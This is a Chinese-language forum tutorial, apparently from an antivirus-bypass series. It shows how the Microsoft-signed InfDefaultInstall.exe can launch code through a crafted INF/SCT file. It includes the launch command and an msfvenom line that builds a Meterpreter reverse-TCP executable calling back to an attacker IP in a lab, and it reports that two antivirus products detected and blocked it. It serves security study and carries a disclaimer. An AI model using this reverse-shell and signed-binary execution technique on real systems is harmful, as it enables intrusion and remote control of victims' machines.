本帖最后由 wholesome 于 2020-3-31 20:21 编辑
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus
一、InfDefaultInstall.exe简介
InfDefaultInstall.exe是一个用来进行inf安装的工具,具有微软签名,存在路径为:
- C:\Windows\System32\Infdefaultinstall.exe
 
我们可以通过直接该文件后面跟inf文件来进行绕过一些限制
二、利用InfDefaultInstall.exe执行程序
- Poc地址如下:https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
在本机进行示例,以下为shady2.inf的代码
以下为shady.sct的代码,可以看到最后是调出notepad.exe的
在cmd窗口中运行
- InfDefaultInstall.exe "C:\Users\Administrator\Desktop\inf_catalog_signing_poc-master\shady\shady 2.inf"
三、利用InfDefaultInstall.exe执行payload
靶机:windows 10 ip地址:172.16.111.194
攻击机:kali linux ip地址:172.16.111.222
首先使用msf生成exe格式的shellcode
- msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=172.16.111.222 lport=3333 -f exe > ./hacker.exe
将生成的exe木马复制到靶机,备份一份shady222.inf并更改shady.sct中的文件路径为hacker.exe
在msf中设置监听
靶机中使用InfDefaultInstall.exe运行shady222.inf
攻击机kali成功监听到靶机上线
以下为靶机安装360全家桶和火绒杀毒后的InfDefaultInstall.exe执行效果:360全家桶报毒,kali无法监听。
火绒报毒,kali无法监听。
四、参考资料
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
| 
发表于 2020-3-31 20:17:13